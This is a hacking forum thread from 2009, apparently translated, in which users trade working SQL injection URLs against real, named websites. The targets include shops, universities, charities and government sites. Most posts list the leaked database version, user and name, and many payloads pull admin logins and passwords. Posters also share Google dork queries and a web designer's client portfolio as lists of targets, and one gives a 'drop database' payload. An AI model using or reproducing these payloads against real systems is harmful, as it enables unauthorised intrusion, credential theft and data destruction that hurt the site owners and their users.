http://www.prologic.com.tw/faq/index.php?id=-34+UNION SELECT 1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),databa se(),version()),8--
4.0.26-log output is in the page source
http://greatplantpick.net/print?searchtype=&id=1;select+cast(version()||chr(58)||user||chr(58) ||current_database()+as+int)
PostgreSQL 8.1.9 on i386-portbld-freebsd6.2, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305:millergarden:gpp
http://www.corkscrewcustomwine.com/index.php?cat_id=-1 union select concat(table_name,0x20,column_name,0x20,table_sche ma),2,3,4,5,6,7,8 from information_schema.columns&catname=Holiday
ILYAtirtir
03.10.2009, 16:38
=)))
http://learn.ditud.ru/reg.php4?trid=-3+union+select+version()
5.0.21-community-nt
http://www.rentsale.ru/general/opisanie.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12,versio n%28%29,14,15,16+from+manager--
Medlinks.ru pr4 TIC=3900
All of medicine on the Internet. Medicine for doctors and patients.
http://www.medlinks.ru/modules.php?op=modload&name=Shop&file=index&do=showpic&pid=400'+and+substring(version(),1,1)=4+--+mysql version: 4.1.20
mysql user: me
[x60]unu
03.10.2009, 19:09
ligai.com.ar ---
http://www.ligai.com.ar/col.php?id=1/**/anD/**/1=8%20/**/uniON/**/aLl/**/seLECT/**/1,database(),version(),user(),1,1,1/*
user - ligai_usuario@localhost
database - ligai_db
version5.0.45-community
p-mart.net
http://www.p-mart.net/m/col.php?id=1/**/aNd/**/substring(version(),1,1)=3/*
branch 3
http://old.dqlake.gov.cn/homepage/zwgk/zwgk_list.php?category=1+and+substring(@@version,1 ,1)=4
5th branch
http://imwerden.de/cat/modules.php?name=books&pa=last_update&cid=-1+union+select+1,column_name,3,4+from+information_ schema.columns+limit+80,1#
PR3
http://www.webmate.gr/siteadmin/forum/bb_profile.php?mode=view&user=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat_ws%280x3a,user_icq,user_password%29,17,18, 19,20,21,22,23,24,25,26+from+users+where+user_icq% 3E0+limit+0,1--
http://www.lomaseutu.fi/majapaikat3.php?id=-114+UNION SELECT 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database (),version()),7,8,9,10,11,12,13,14,15
lomaseutufi@10.1.0.8 : lomaseutufi : 5.0.22-log
mailbrush
04.10.2009, 15:32
dealunion.com
Estimated number of visits for www.dealunion.com
5,383 visits per day
http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17%23
Database Version: 5.0.81-community-log
Database name: dealunio_cat
User name: dealunio_niyteie@localhost
http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,id,name,password,e xamined,savetime,truename,sex,phone,address,email, proffesion,roleid,deptid,duty,sequence),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17+from+users%23
DeepBlue7
04.10.2009, 22:02
http://www.globa.ru/School.asp?ID_Sel=1'
Got as far as
http://www.globa.ru/School.asp?ID_Sel=1+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'fond'+AND+COLUMN_NAME+NOT+IN+('id','rus_name','en g_name','realname','b_loc_date','b_loc_time','b_gm t_date','b_gmt_time','bplace','b_long_min','b_long side','b_long_sec','b_lati_min','b_latiside','b_la ti_sec','b_suns','b_moon','b_week','b_ages','s_fad e_date','s_fade_time','l_fade_date','l_fade_time', 'd_date','d_time','dplace','d_info','d_take','d_ag es','rate','marriage','children','marrinfo','detai l','photoa','photob','natalmap','planet','placid', 'star','others','body','show','vpos','makedate','z orototems','zorocolors','chinyear','chincolors'))--
Then I gave up ))
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
DeepBlue7
05.10.2009, 00:25
http://www.ardiatech.com/main.asp?id_sel=1&cat=news&sCat=news_content&sel_nav1=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INF ORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='q_regist rants'+AND+COLUMN_NAME+NOT+IN+('reg_id','name','ad dress','tel','email','took_a_shot','successful','d ate_inserted'))--
Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.toptrucks.cz/ext/detail.php?PHPSESSID=j5h2rm84vp3g3re3tmbg6fqdq4&advert_key=1+and+1=cast((select+version())||chr(58 )||user+as+Int)
PostgreSQL 8.1.11 on i686-pc-linux-gnu, compiled by GCC 2.96:sys_anon
DeepBlue7
05.10.2009, 01:01
Rostov Oblast Administration
http://www.donland.ru/content/info.asp?partId=5&infoId=1+or+1=@@version--
Microsoft SQL Server 2008 (SP1) - 10.0.2723.0 (Intel X86) Jul 10 2009 01:41:08 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
http://www.travellingtight.com/journal.php?id=3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1
Database Version: 5.0.27-Debian_0.dotdeb.1
Database name: travellingtight_main
User name: travellingtight_us3r@localhost
DezMond™
05.10.2009, 13:26
http://www.sciencesmath-paris.math.jussieu.fr/index.php?page=-16'+union+select+1,2,concat_ws(0x3a,ID_USER,LOGIN_ USER,PASS_USER,NOM_USER,PRENOM_USER,GENRE_USER,MAI L_USER,LVL_USER)+from+FOND_USER+limit+3,1+/*+&lien=14&lang=fr
http://www.sgieurope.com/index.php?RubID=24+union+select+1,2,concat_ws(0x3a 3a,UserLogin,UserPassword),4,5,6,7,8,9,10+from+use r+--+
http://www.fhp.fr/index.php?ID=&LangueID=1&ThemeID=-1+union+select+1,2,3,4,5,6,7,8+from+user+--+&RubID=1
http://surlinjobs.com/showjob.php?jobcode=-2604+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,concat_ws(0x3a3a,id,username,pa ssword),22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 +from+admin+limit+6,1+--+
Gis-t.org pr5
The American Association of State Highway and Transportation Officials sponsors the annual GIS for Transportation Symposium.
http://www.gis-t.org/poster.php?year=2008+and+substring(version(),1,1)= 5+--+mysql version: 5.0.81-community
mysql user: gistorg_db@localhost
[x60]unu
05.10.2009, 21:38
fitness.yantra.su -
http://fitness.yantra.su/next.php?id=1/**/anD/**/1=8%20/**/unION/**/seLEcT/**/1,version(),3/*
version - 4.1.22-log
user - yantra_admin@10.1.113.107
database - yantra_main
http://www.theglasgowcollective.com/artists/detail/index.php?id=-1+UNION+SELECT+database(),version()
version - 5.0.45-log
user - theglasgow1@213.171.218.137
database - theglasgow1
Slavuti4
05.10.2009, 22:34
www.psychodelart.com
TIC:20
http://www.psychodelart.com/projects.php?ptype=-4+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9/*
Version():4.0.27-max-log
Database():geokon10_db01
User():geokon10_db01@v41.valuehost.ru
www.geokongroup.com
TIC:20
PR:4
http://www.geokongroup.com/shownews.php?news=-42+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7
Version():4.0.27-max-log
Database():geokon10
User():geokon10@v41.valuehost.ru
http://www.sacredpassage.com/schedule/index.php?id=-1+UNION+SELECT+1,user%28%29,3,4
version - 4.1.22-standard-log
user - sacredpa_sacred1@localhost
database - sacredpa_sacredpa
DeepBlue7
06.10.2009, 00:27
http://www.sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://livefrogsupyourarse.com/index.php?cat=php&item=1+UNION+SELECT+1,2,version(),4,5,6,7,8+LIMIT+ 1,1
Database Version: 5.0.81-community
Database name: livefrog_frosk
User name: livefrog_loon@localhost
http://www.obs.org/page.php?ITEM=26+UNION+SELECT+1,2,3,4,5,6,7,8,9+FR OM+users+LIMIT+1,1
Database Version: 4.0.27-max-log
Database name: db136428592
User name: dbo136428592@74.208.16.121
http://www.greenmagazine.com.au/news.php?aid=257+UNION+SELECT+1+FROM+LIMIT+1,1
Database Version: 4.1.22-standard-log
Database name: gre32382_greenmagazine
User name: gre32382@localhost
http://www.fyne.co.uk/index.php?item=-163+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,concat_ws(0x3a,user(),database(),versi on()),20,21,22,23,24,25,26,27,28,29,30,31,32+--+
User: dbo166299381@212.227.118.54
Database: db166299381
Version: 4.0.27-max-log
http://www.emediaworld.com/press_release/release_detail.php?id=-87007+union+select+1,2,3,4,5,6,7,8,9,10,version(), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- a five
4.0.27-standard
http://www.sphinxcomputer.de/html/news.php?id=-657+union+select+1,2,3,version(),5,6--
5.0.51a-3-log
http://www.kami-stylez.de/news.php?id=-83+union+select+1,2,3,version(),5,6,7,8,9,10--
http://www.lymediseaseassociation.org/referral/Petitions/Petition.php?id=-1'+union+select+1,2,version()+--+
branch 5
http://www.sts.cornell.edu/viewprofile.php?ProfileID=-1+union+select+1,userid,0x3c3c3c3,unhex(hex(passwo rd)),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+use rs+limit+1,1%20--
PR6
http://score.dnr.sc.gov/deep.php?subject=2&topic=1+union+select+1,concat(0x2a,version(),user( ),database()),3,4,5+limit+1,1/*
4.1.20 score@localhostscore
Some online store)))
http://www.avtax.ru/?info=3+union+select+1,concat_ws(user(),0x3a,versi on(),0x3a,database()),3,4,5/*&subinfo=9
And here's the funny part! The output:
# Кто мы?
# :avtax2@localhost.localdomain5.0.24-standardavtax2@localhost.localdomain:avtax2@localh ost.localdomaindb_avtax2
Next
http://www.avtax.ru/?info=3+union+select+1,table_name,3,4,5+from+infor mation_schema.tables/*&subinfo=9
From here I think it will be clear to everyone))))
You can also run ;)
http://www.avtax.ru/?info=3+drop+database+db_avtax2/*&subinfo=9
But I didn't do that... :D
http://www.soltis-toiles.com/cat.php?p=11+UNION+SELECT+1,version(),3,4,5,6,7,8, 9+LIMIT+1,1
Database name: soltis-stores
User name: soltis-stores@localhost
Database name: soltis-stores
0nep@t0p
08.10.2009, 00:18
http://www.firestone-duncan.com/print.php?topic=Services&cid=-1+union+select+1,2,'xekme',4,5,6+from+mysql.user--+
http://www.omatmerkit.inex.fi/default.asp?viewID=1474&productID=@@version
MsSQL
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
http://www.techiwarehouse.com/cms/articles.php?cat=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16+--+
gooxakep
08.10.2009, 11:59
http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+f rom+admin--
http://www.modeli.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+f rom+admin--
4.1.22
http://freshfiction.com/page.php?id=-2029+union+select+1,2,3,4,version(),6,7,8,9,10--
DezMond™
08.10.2009, 13:41
pr5
http://www.cc-bassin-annonay.fr/communes/clubasso/consulterclubasso.php3?num=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+users+/*+&css=2
pr5
http://www.latina.fr/index.php?id=3&art=-345+union+select+1,2,concat_ws(0x3a3a,pseudo,mdp,a dmin),4,5,6+from+users+--+
http://www.adofm.fr/index.php?id=65&art=943&idcat=-16+union+select+1,2,unhex(hex(concat_ws(0x3a3a,pse udo,mdp,admin))),4,5,6,7+from+users+--+&idvid=168
http://endirect.univ-fcomte.fr/index.php?id=numero_98_13_1&art=-1079'+union+select+1,group_concat(table_name),3,4, 5,6,7,8,9+from+information_schema.tables+/*+
http://www.technique-voile.com/actualites_voile/index.php?ID=-233'+UniOn+sElEct+1,2,3,4,5,6,7,8,9,10,11+from+adm in+--+
http://www.xatrik.ru/katalog/catalog.php?id=-1+union+select+1,user%28%29,3,4,5,6,7--
xatrikr0_t@localhost
4.1.25
http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--
5.0.27:internationorg_all:cmr@localhost
-------
Tables
http://www.international-alert.org/press/archive.php?id=-243+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+from+INFORM ATION_SCHEMA.TABLES--
-------------------------
http://www.webc-budapest.com/content/news_id.php?lang=en&id=-92+union+select+1,2,3,version(),5--
user() - lh288200@localhost
version() - 4.0.27
database() - lh288200db
http://eupodo.de/category.php?IndustryID=169+union+select+1,2,conca t_ws(0x3a,loginid,password)+from+admin--
5.0.32-Debian_7etch8-log
eupodosql
eupodosql1@localhost
http://eupodo.de/category.php?IndustryID=169+union+select+1,2,user% 28%29+from+admin--
InDuStRieS
08.10.2009, 18:15
http://www.ccrl.ca/print.php?id=-5061+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29
Found a vulnerable site engine (CMS)
It can be found with this Google query:
category.php?IndustryID=
The site I found:
http://worldb2b.org/category.php?IndustryID=-14+union+select+1,2,concat_ws(0x3a,LoginID,Passwor d,AdminEmail,AdminEmailPassword,smtp,ScriptName,ur l,smtpstatus,port,Title,nochex,twoco,paypal,goldme mberfee)+from+admin--
http://justclone.com/alibabaclone/category.php?IndustryID=-31+union+select+1,2,group_concat(column_name)+from +information_schema.columns+where+table_name=0x616 46d696e--
I think you'll figure out the rest
-------------------
http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
--
version() - 5.0.51A
user() - VOGUE_FASHION@LOCALHOST
database() - VOGUE_FASHION
--
Tables
http://www.fashionsnightout.com/storelisting.php?id=-707+union+select+1,2,3,4,5,6,7,8,9,10,11,TABLE_NAM E,13,14,15,16,17,18+from+INFORMATION_SCHEMA.TABLES--
-------------------
http://vesti.az/category.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13--
--
version() - 5.0.81-community
user() - vestiaz@localhost
database() - vestiaz_novost
--
5.0.32-Debian_7etch3~bpo31+1-log
http://www.taiwanb2b.com/category.php?IndustryID=34+union+select+1,2,concat _ws%280x3a,loginid,password%29+from+admin--
http://www.steinbeis-europa.de/index.php5?id=-409+unIon+seleCt+1,concat_ws(0x3a,user(),version() ,database())+--+&file=192
User: root@www.steinbeis-europa.de
Version: 5.0.32-Debian_7etch8-log
Database: sez
4.1.22 log
http://www.freemp3.org.ua/news.php?id=-139+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15--
Pavlodar.gov.kz pr4 TIC=200
Office of the Akim of Pavlodar Region
http://www.pavlodar.gov.kz/page.php?page_id=1000+and+substring(version(),1,1) =5version: 5.1.22-rc-log
user: db_pavlo@localhost
P.S. hometown of the great webkill?)
Skydivers
http://www.skydiver.com.ua/publication/index.php?cat_id=-3%20union%20select%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,%2030%20--
skydiver@localhost: skydiver: 4.0.27-log
Zombi ****
09.10.2009, 17:07
http://www.ksk1.com.ua/news.php?id=-1+union+select+1,2,3,4--
Database Version: 4.1.22-standard-log
Database name: ksk1com_db
User name: ksk1com_db@localhost
http://www.sgg.go.gov.br/agenda_21.php?idMateria=1+and+1=cast((select+versi on())||chr(58)||user+as+int)
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:sgg
Clothing store, branch 5
http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858% 29,login,psw%29,5,6%20FROM%20guest%20limit%201,1
http://www.svitstyle.com.ua/index.php?page=-14%20union%20select%201,2,3,concat_ws%28char%2858% 29,uname,upass%29,5,6%20FROM%20users%20limit%201,1
Different tables.
News of Dnepropetrovsk and Ukraine, branch 5
http://www.prodnepr.dp.ua/news.php3?action=details&news_id=-1335%20union%20select%201,2,login,4,passw+FROM%20j ob_catvip
0nep@t0p
09.10.2009, 21:07
http://www.swftools.com/
http://www.swftools.com/tools-category.php?cat=-289'+union+select+1,group_concat(table_name,0x3a,t able_schema),3,4,5,6,7,8+from+information_schema.c olumns+where+column_name+like+'%pas%'--+
http://www.naturistproperty.com/
http://www.naturistproperty.com/index.php?ac=details&id=86+union+select+1,2,3,4,5,6,concat_ws(0x3a,admi n_id,first_name,last_name,email,password),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29+from+admin--+
http://www.naturistproperty.com/admin
EDU
PR7
http://www.cogsci.ucsd.edu/cmp-general-data-display.php?display=true&what=perspective&id=119+and+1=0+union+select+1,2,3,4,concat_ws(0x3a ,version(),user(),database(),@@version_compile_os) ,6,7,8,9,10+--+-
Database version:5.0.77
Database user: admin@localhost
Database name: cogsci
OS version:redhat-linux-gnu
AGAIN I found a vulnerable site CMS script, or an image gallery, something like that.
CMS name: All text and images © copyright Delta Patchwork LLC, or something like that
Site location: https://208.186.168.218:19638/siteadmin/?ocw_login_domain=
all these vulnerable engines are hosted on this server!
You can find them with this Google query:
Site designed and hosted by GloDerWorks
or
All text and images © copyright Delta Patchwork LLC
4.1.22-log
http://www.tayport.org.uk/photo.php?id=-329+union+select+1,2,3,version(),5--
4.0.27-max-log
http://www.contrastproject.org/photo.php?id=-92+union+select+1,2,3,version(),5,6,7,8,9--
5.0.67
http://www.team-parkinson.org/photo.php?ID=-69+union+select+1,2,3,4,5,6,version(),8,9,10,11--
5.0.45
http://dublin.anglican.org/photo.php?id=-753+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13--
If you want to hack all the sites without any trouble (that is, without searching),
please visit the site of this CMS's designers; they have listed all their clients there!
American sites:
http://www.gloderworks.com/USA-portfolio.php
Sites in the Kingdom:
http://www.gloderworks.com/UK-portfolio.php
Oh, and the designers' own site is vulnerable too...
I won't say no to some plus votes
http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase())+--+
User - gallery@localhost
Version - 4.0.17
Database - saratov
cwas.hinah.com
http://cwas.hinah.com/interview/?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9+--
user-hinah@192.168.3.152
db-hinah
version-4.0.18-log
'(
[x60]unu
10.10.2009, 14:57
ventomir.ru - TC=20
http://www.ventomir.ru/next.php?id=1/**/anD/**/1=2%20/**/uniON/**/seLECT/**/unhex(hex(version()))/*
version - 5.0.32-Debian_7etch8
user - ventomirru@localhost
database - ventomirru
Cnjx.gov.cn pr5
Site of the Chinese district of Jixi. As far as I understood )
http://www.cnjx.gov.cn/vod/vod_view.php?id=null+union+select+null,null,concat _ws(char(32,124,32),version(),user(),database()),n ull,null,null,null,null,null,null,null,null,null,n ull,null+--+4.0.26-nt | webuser@localhost | web_db
DezMond™
10.10.2009, 20:42
http://www.pouillysurloire.fr/index.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,g roup_concat(table_name),16+from+information_schema .tables+/*+&lang=fr&p=4
http://www.cap-dail.fr/index.php?id=6795&idn=-4118+union+select+1,login,pass,4,5,6+from+cms_admi n+limit+0,1+/*+
http://www.theoule-sur-mer.org/index.php?id=7211&idag=-2148+union+select+1,2,concat_ws(0x3a3a,login,pass) ,4,5,6+from+cms_admin+limit+1,1+/*+
http://www.lebarsurloup.fr/index.php?id=1020&idn=-4336+union+select+1,login,pass,4,5,6+from+cms_admi n+/*+
http://www.ville-la-turbie.fr/index.php?id=4906&idn=-2470+union+select+1,concat_ws(0x3a3a,login,pass),3 ,4,5,6+from+cms_admin+/*+
never did find the admin panel((
http://www.spiritualitea.com/index.php?option=com_userlist&Itemid=77
in the search field:
-1') union select 1,concat_ws(0x3a,version(),database(),user()),3,4, 5,6,7,8 -- 1
BlackSun
11.10.2009, 14:30
Dating, MS Access
_http://www.freedatingusa.com/uk/index.asp?action=sites&link=-1+OR+1=2
http://www.rabota-v-chelyabinske.ru/view_vac.php?id=-11050+UNION+SELECT+1,2,3,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20
Version:5.0.26-log
Database:chelsiru_job
User:chelsiru_job@localhost
Os: pc-linux-gnu
..::TROYAN::..
11.10.2009, 17:12
http://www.medikas.info/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password,us er(),version())+from+admin--
_http://www.it-recycling.dk/shownews.php?id=804353543534+union+select+1,2,3,co ncat_ws%280x3a,username,hashed_password%29+from+us ers+limit+0,1
_http://www.rauschpromotion.de/shownews.php?id=79646+union+select+1,2,3,4,table_n ame,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24+from+information_schema.tables+limit+22,1
sexicq.ru
http://sexicq.ru/payment.php?id=4'
blind SQL injection, version 5
tables
-------------
Krist_ALL
11.10.2009, 20:39
http://www.acube-systems.biz/index.php?page=news&id=-1+union+select+1,2,3,4,5+
PR 4, branch 4
DezMond™
12.10.2009, 12:20
http://www.peterchalkco.co.uk/index.php?Id=-8+union+select+1,2,3,concat_Ws(0x3a3a,adminUsernam e,adminPassword),5,6,7+from+tabFoamAdmin+limit+1,1 +--+
http://www.sfha.co.uk/index.php?pg=5&id=-578+union+select+1,2,concat_ws(0x3a3a,user_name,pa ssword,administrator),4,5,6,7,8,9,10,11,12+from+us ers+/*+
http://www.ukweddingdresscleaners.co.uk/index.php?Id=-8+union+select+1,2,concat_Ws(0x3a3a,Id,adminUserna me,adminPassword),4,5,6,7+from+tabAdmin+--+
http://www.lotusnotesdomino.de/pageContent.php?prdid=39&subpage=-149+union+select+1,2,3,4,5,6,group_concat(table_na me),8+from+information_schema.tables+/*+&pg=6'
http://www.bestbowlers.info/shownews.php?id=-20+union+select+1,2,3+from+admin+/*+
http://troyleedesigns.com/company/news/article.php?news_id=-1+union+select+1,user_name,3,password,5,6,7,8,9,10 ,11,12,13+from+user--
[x60]unu
12.10.2009, 12:32
odessa.co.ua ---
http://www.odessa.co.ua/houses/?p=view&num=900%20and%201=2%20union%20all%20select%201,2,v ersion(),4,5,6,7,8,9,0,1/*
version - 4.1.22-standard-log
user - odessac_main@localhost
database - odessac_odessa
Krist_ALL
12.10.2009, 15:40
EDU PR 5
http://www.continuinged.ku.edu/aero/course.php?aid=-7+union+select+1,2,3,4,5,6,7,8,9/*
Database Version: 5.0.45
Database name: aerocourses
User name: webber@localhost
EDU 7!
http://www.polytechnique.edu/interview.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
Database Version: 5.0.86
Database name: contenu
User name: edu@localhost
_http://www.andhrastudio.com/studio.php?id=-2009+union+select+1,version(),3,4,5,6--
_http://ghbarratt.com/studio/php/artwork.php?id=-22+union+select+1,version(),3,4,5,6--
Skofield
12.10.2009, 19:44
http://www.imca.com/raceresults.php?id=-50+union+select+1,2,version(),4/*
Database Version: 4.1.22-standard
Database name: imca_main
User name: imca_dba@localhost
PR 6
http://www.ikisahil.com/content/index.php?link=news_id.php&category=medeniyyet&id=-4734+UNION+SELECT+1,2,3,4,5,6
Database Version: 4.1.25
Database name: ikisahil_ikisahil
User name: ikisahil_ikisahi@localhost
http://sistermarybuttface.com/users.php?id=-121+union+select+version()--
mailbrush
12.10.2009, 23:30
http://www.baltichouse.spb.ru/index.php?language_id=1§ion_id=-57+union+select+concat_ws(0x3a,user(),database(),v ersion())baltcspb@localhost:baltcspb:4.1.20-lk-log
http://www.nccu.edu.tw/news/detail.php?news_id=1+and+substring(@@version,1,1)= 5
[x60]unu
13.10.2009, 02:16
star-modelgroup.com --- TIC=30
http://www.star-modelgroup.com/index.php?PageID=27&LangID=0+anD+1=2+union+all+select+1,2,3,4,version( ),6,7/*
version - 4.1.22-standard-log
user - starmod_usr@localhost
database - starmod_mgf
os - unknown-linux-gnu
Online store for diving and spearfishing gear
http://plavniki.com.ua/products.php?act=prod&pid=-1618%20union%20select%20login%20from%20admins--
branch 4
P.S.: the output is at the very top, on the left
Small children's store
http://www.baby-market.com.ua/catalog.php?id_cat=-21%20union%20select%201,2,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,4,5,6%20%20--
4.0.27-log:user_babymarket:babymarket@localhost
TIC: 70
House of Leather
http://domko.com.ua/index.php?id=194&show=-259%20union%20select%201,2,3,concat_ws%280x3a,vers ion%28%29,database%28%29,user%28%29%29,5,6%20--
5.0.51a-24-log:firstline_base:firstline_base@localhost
TIC: 10
PR: 1
Another small store
http://agent.dp.ua/catalog.php?id=7&sub_id=6%20union%20select%201,2,3,4,5,concat_ws%28 0x3a,version%28%29,database%28%29,user%28%29%29,7, 8,9,10,11--
4.1.22-log:agent:agent@localhost
TIC: 10
PR: 2
Children's goods store
http://pingvi.com.ua/index.php?cat=-6%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,concat_ws%280x3a,version%28%29,databa se%28%29,user%28%29%29,19,20,21,22,23%20--
5.0.75-log:pingvi:pingvi@localhost
and here's something else I dug up, it might be useful to someone
http://pingvi.com.ua/templates/vamshop/
http://pingvi.com.ua/templates/vamshop_table/
http://pingvi.com.ua/templates/
Sewing machine store
http://saleshop.com.ua/index.php?idShopTovar=-25%20union%20select%201,concat_ws%280x3a,version%2 8%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21%20--
5.0.51a:shopsale2:shopsale2@localhost
hack-win32
13.10.2009, 10:34
spring08787@localhost:spring:5.0.51
http://www.springscream.com/doc.php?id=-29+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10--
user_pbg@localhost:db_pbg:5.0.62
http://www2.parquebiologico.pt/doc.php?id=-22+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
5.0.67-community
http://www.gai-mn.org/contact.php?id=-3+union+select+version(),2--
5.0.41
http://www.publicnewsservice.org/contact.php?id=-1+union+select+1,version(),3,4--
5.0.32-Debian_7etch11-log
http://cox.nofuture.org.uk/contacts/contact.php?id=-86+union+select+1,2,3,4,5,6,version(),8,9,10,11,12--
http://www.compareplastic.com/display.php?id=-1%20union%20select%20concat%28table_name,0x20,colu mn_name,0x20,table_schema%29%20from%20information_ schema.columns%20limit%20205,2/*&page=cat
http://www.pcdiscounters.com/products.php?groupID=-1+union+select+1,concat%28table_name,0x20,column_n ame,0x20,table_schema%29+from+information_schema.c olumns+limit+177,200
http://jennisonqc.com/search_result.php?part_id=-1%20union%20select%201,2,version%28%29,4,5,6,7,8,9 ,10,11,12,13,14
http://www.coastalgoods.com/product_list.php?cat_id=-1+union+select+1,2,concat%28table_name,0x20,column _name,0x20,table_schema%29+from+information_schema .columns+limit+223,10
http://www.alvaco.com/products_detail.php?prod_id=-1 union select 1,concat(table_name,0x20,column_name,0x20,table_sc hema),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns limit 230,1
..::TROYAN::..
13.10.2009, 17:28
http://lifemusic.su/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password,us er(),version())+from+admin--
TIC 10
lifemusic_mysql@10.1.104.46:4.1.22-log
hack-win32
13.10.2009, 17:39
4.1.25-log:wwwmetronicsru:metronic@localhost
http://metronics.ru/good.php?id=-1942943971+union+select+1,2,3,concat_ws(0x3a,versi on(),database(),user())--
sinergy@localhost:letturelibere:5.0.45-community-nt
http://www.letturelibere.net/download.php?id=-242+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),database(),version()),9,10,11,12,13,14--
dannyjgb2@linweb4.atlas.pipex.net:dannyjgb2:5.0.68-percona-3-log
http://www.infobite.co.uk/UsedProducts/make.php?ID=-63+union+select+concat_ws(0x3a,user(),database(),v ersion()),2--
jdson@linweb4.atlas.pipex.net:jdson:5.0.68-percona-3-log
http://www.theprintroomsupplycompany.co.uk/NewProducts/make.php?ID=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--
apishop@localhost:apishop:4.0.27
http://www.apishop.ru/good.php?id=-121+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),database(),version())--
SITE@GATORADE.DREAMHOST.COM:STEPH:5.0.67-USERSTATS-LOG
http://www.sgoralnick.com/design.php?id=-213+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14--
gra34464_user@localhost:gra34464_graphix:4.1.22-standard-log
http://graphixsolutions.com.au/graphic-design.php?id=-14+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8--
resist@70.32.74.49:sizefactory:5.0.45-log
http://www.sizefactory.com/design.php?id=-2+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5--
